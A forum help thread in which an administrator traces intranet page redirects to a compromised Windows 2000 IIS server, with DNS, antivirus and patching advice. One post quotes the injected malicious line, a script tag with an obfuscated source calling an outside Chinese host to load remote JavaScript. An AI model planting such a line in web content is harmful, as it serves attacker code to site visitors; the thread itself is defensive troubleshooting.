Want to protect your cyber security and still get fast solutions? Ask a secure question today.Go Premium

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 814
  • Last Modified:

Web pages are being redirected

Hi All,
It seems that our web pages are being redirected toe http://www.365http.cn/tt/logo.htm every time the users try to access a n intranet site.
Kronos1.doc
0
afsaleh
Asked:
afsaleh
  • 11
  • 11
  • 4
  • +1
5 Solutions
 
mrwalker15Commented:
Your DNS cache has been poisoned. Clear the DNS cache from all your DNS servers.
0
 
AncientFribCommented:
Ensure there aren't any bad entries for the intranet DNS record on your DNS server.  Run from the command prompt: IPconfig /flushdns on your DNS servers and clients.  Good luck.
0
 
afsalehAuthor Commented:
How can I clear the dns cache on dns servers
0
Concerto's Cloud Advisory Services

Want to avoid the missteps to gaining all the benefits of the cloud? Learn more about the different assessment options from our Cloud Advisory team.

 
afsalehAuthor Commented:
Tried running ipconfig /flushdns on both clients and dns servers, but did not work
0
 
Hugh FraserConsultantCommented:
Make sure you flush the caches on both your internal DNS server, and your firewall's DNS server. Either or both could be poisoned.

If you have the opportunity, you can dump the DNS server's caches before flushing them to check for poisoning. Also, current releases of DNS servers should be resistant to DNS poisoning, so make sure your DNS server is an up-to-date release. If it got poisoned once, it can happen again unless you change something to prevent it.
0
 
mrwalker15Commented:
Are you using Microsoft DNS Servers? If so, go to DNS mmc console.

Add or select (highlight it) the server. Right-click and select Clear DNS cache.
0
 
mrwalker15Commented:
To help prevent cache poisoning. Under DNS mmc console.

Select the server

Right-click Properties > Advanced tab

Make sure "Secure cache against pollution" option is set.

Also, if you have a proxy server you may need to clear the cache there too.
0
 
afsalehAuthor Commented:
tried cleaning cache on the dns server, but problem remains
0
 
mrwalker15Commented:
Can you post the source code of the webpage in the picture?
0
 
Hugh FraserConsultantCommented:
Let's verify DNS is actually the issue. From a command shell, do an nslookup for one of your intranet sites that users are having trouble with. What is the response?
0
 
afsalehAuthor Commented:
When doing nslookup on a local intranet site, the result is the name of the dns servcer.com and its ip address.
0
 
Hugh FraserConsultantCommented:
You should see something like

Server:            192.168.1.1
Address:      192.168.1.1#53

Name:      www.domain.com
Address: 192.168.1.2

If you resolve an address on the Internet against your DNS server, you should see something like:

nslookup www.google.com
Server:            192.168.1.1
Address:      192.168.1.1#53

Non-authoritative answer:
www.google.com      canonical name = www.l.google.com.
Name:      www.l.google.com
Address: 72.14.205.99
Name:      www.l.google.com
Address: 72.14.205.104
Name:      www.l.google.com
Address: 72.14.205.147
Name:      www.l.google.com
Address: 72.14.205.103

The difference is that you're not the authoritative source for www.google.com

Is this not similar to what you see?
0
 
mrwalker15Commented:
Can you post the source code of the webpage.
0
 
afsalehAuthor Commented:
When doing the nslookup , I do see the same info as you have displayed  with the exception of the port #.
The first line will refer to the domain controller /dns controller  /wins server, while the second line refer to the actual application server.

Also please find attached the source code for the webpage.

Thanks
portal.txt
0
 
mrwalker15Commented:
Your webpage was hacked.

Please remove the top line.
<script language=javascript src=http://%77%2E%63%38%38%6A%2E%63%6E/lg.js></script>

That points to w.c88j.cn/lg.js
0
 
afsalehAuthor Commented:
I did remove this line fron the script , under view source. It keeps coming back
0
 
mrwalker15Commented:
You need to scan your web server for malware. it must have a process rewriting the line to the web page everytime you update it.
make sure you have all the latest patches available installed as well.
0
 
afsalehAuthor Commented:
What is the best scaner for this job. tried few , but none of them seems to work
0
 
mrwalker15Commented:
What is your web server?
0
 
afsalehAuthor Commented:
windows 2000 sp4
0
 
mrwalker15Commented:
I would recommend Karspersky AV, spybot search and destroy. Secunia software advisor.

Patch everything UP straight away. if possible, turn off external access as this server is infected.

And run away from Windows 2000. It is a security hole!
0
 
afsalehAuthor Commented:
ran spybot on th eserver and on the clients. Did not find any thing. The application will run fine on the server, but gets hijacked on the clients.
0
 
mrwalker15Commented:
Ok, it seems that this is a code injection via ARP spoofing.

Can you see in the IIS logs if users are actually connecting to IIS to browse the webpage?
0
 
Hugh FraserConsultantCommented:
This is a virus wit a payload that downloads a bunch of other code. I'f you've viewed this page from a browser on your web server, it's infect as well as the clients that view the page.

Shut down the web server before anything else gets infected. This isn't spyware. It's a virus/trojan. As mrwalker15 mentioned, run an anti-virus on the server and the clients. It's recognized by all the major ones. Check out:

http://virscan.org/report/00406cc94d36b929bb659b0241e2219b.html

to make sure your AV is up-to-date for this virus.
0
 
afsalehAuthor Commented:
That works, thanks
0
 
mrwalker15Commented:
Hi afsaleh,

What did actually work?
0
 
afsalehAuthor Commented:
Ran sybot on both server and clients in safe mode. Also patched the server and clients with latest security patches.
After the rebooting to normal mode, flushed the dns buffer on both server and cloient, and re-installed the ie browser.
0

Featured Post

[Webinar On Demand] Database Backup and Recovery

Does your company store data on premises, off site, in the cloud, or a combination of these? If you answered “yes”, you need a data backup recovery plan that fits each and every platform. Watch now as as Percona teaches us how to build agile data backup recovery plan.

  • 11
  • 11
  • 4
  • +1
Tackle projects and never again get stuck behind a technical roadblock.
Join Now